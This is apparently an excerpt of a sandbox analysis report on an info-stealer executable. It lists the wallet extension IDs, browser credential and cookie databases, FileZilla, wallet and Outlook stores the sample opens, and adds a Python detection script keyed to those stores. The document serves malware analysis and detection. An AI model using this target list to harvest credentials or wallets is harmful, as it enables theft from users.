Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco_
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp$
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\MultiDoge\\multidoge.wallet`
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: Process Memory Space: EZrw1nNIpG.exe PID: 3792, type: MEMORYSTR
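The file and registry accesses listed above are the sample's collection phase: Chromium and Firefox credential, cookie and history databases, the FileZilla server list, a dozen desktop wallet directories, and the Outlook MAPI profile keys, all opened by one process that is none of those applications. That pattern is the detection opportunity. The script below is an added example, not part of the Joe Sandbox report and not the sandbox's own logic: it classifies object-open events against the store locations the report shows (widened slightly to neighbouring files of the same stores, such as Firefox logins.json and FileZilla sitemanager.xml), drops accesses by the application that owns each store, and reports any other process that touched several categories. The event stream and the per-store process allowlist are assumptions, and the sample events are constructed for the run.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set, Tuple


@dataclass(frozen=True)
class AccessEvent:
    """One object-open record: which process image opened which file or registry key.
    Assumed to come from a sandbox trace or from Windows object-access auditing
    (a SACL on the stores); the shape is an assumption for this example."""
    image: str
    target: str


# Store locations grouped by what the stealer is after. Written from the paths in
# the report and widened to neighbouring files of the same stores.
STORE_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("browser_credentials", re.compile(
        r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\"
        r"(Login Data|Web Data|History|Network\\Cookies)", re.I)),
    ("browser_credentials", re.compile(
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(places|cookies|logins)\.(sqlite|json)", re.I)),
    ("ftp_credentials", re.compile(r"\\FileZilla\\(recentservers|sitemanager)\.xml$", re.I)),
    ("crypto_wallet", re.compile(
        r"\\AppData\\Roaming\\(Bitcoin|Electrum(-LTC)?|ElectronCash|Exodus|MultiDoge|jaxx"
        r"|com\.liberty\.jaxx|atomic(_qt)?|Binance|Coinomi|Ledger Live|Guarda)\\", re.I)),
    ("mail_profile", re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I)),
]

# Hypothetical allowlist of process basenames expected to open each store. In
# production match on the signed image path, not the basename: a stealer can call
# itself chrome.exe or inject into the real browser, and neither trips this check.
ALLOWED_IMAGES: Dict[str, Set[str]] = {
    "browser_credentials": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "ftp_credentials": {"filezilla.exe"},
    "crypto_wallet": {"bitcoin-qt.exe", "electrum.exe", "exodus.exe", "atomic.exe"},
    "mail_profile": {"outlook.exe"},
}


def classify(target: str) -> Optional[str]:
    """Return the store category a path or key belongs to, or None if it is not one."""
    for category, pattern in STORE_PATTERNS:
        if pattern.search(target):
            return category
    return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[AccessEvent]) -> List[Tuple[str, str, str]]:
    """Return (image, category, target) for every access to a sensitive store by a
    process that is not the store's owning application."""
    hits = []
    for ev in events:
        category = classify(ev.target)
        if category is None or basename(ev.image) in ALLOWED_IMAGES[category]:
            continue
        hits.append((ev.image, category, ev.target))
    return hits


def summarize(hits: Iterable[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Categories touched per process. One process spanning browser, wallet, FTP and
    mail stores in a single run is the stealer signature this report documents."""
    by_image: Dict[str, Set[str]] = {}
    for image, category, _ in hits:
        by_image.setdefault(image, set()).add(category)
    return {image: sorted(cats) for image, cats in by_image.items()}


# Constructed sample events modelled on the report's observations, plus two benign
# accesses that must not fire.
STEALER = r"C:\Users\user\Desktop\EZrw1nNIpG.exe"
SAMPLE_EVENTS = [
    AccessEvent(STEALER, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(STEALER, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite"),
    AccessEvent(STEALER, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal"),
    AccessEvent(STEALER, r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"),
    AccessEvent(STEALER, r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    AccessEvent(STEALER, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
                         r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001"),
    AccessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for image, categories in summarize(detect(SAMPLE_EVENTS)).items():
        print(f"{image}: {', '.join(categories)}")
```

The per-category allowlist keeps the rule quiet on a normal desktop, where only the browser opens Login Data and only Outlook opens its MAPI profile. The useful alert is not any single hit but the summary: a process with no business in any of these stores reading four categories within seconds, which is exactly what the report's list shows for EZrw1nNIpG.exe. Pair it with the Yara matches the sandbox reports on the unpacked image, since a stealer that injects into the browser or runs in an allowlisted process name evades the path-and-image check.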

Remote Access Functionality

Source: Yara match File source: 13.2.3eb62d09c2.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EZrw1nNIpG.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2385661873.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2514385520.0000000000D01000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2389921177.0000000001614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EZrw1nNIpG.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3eb62d09c2.exe PID: 7356, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 13.2.3eb62d09c2.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EZrw1nNIpG.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2385661873.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2514385520.0000000000D01000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EZrw1nNIpG.exe PID: 3792, type: MEMORYSTR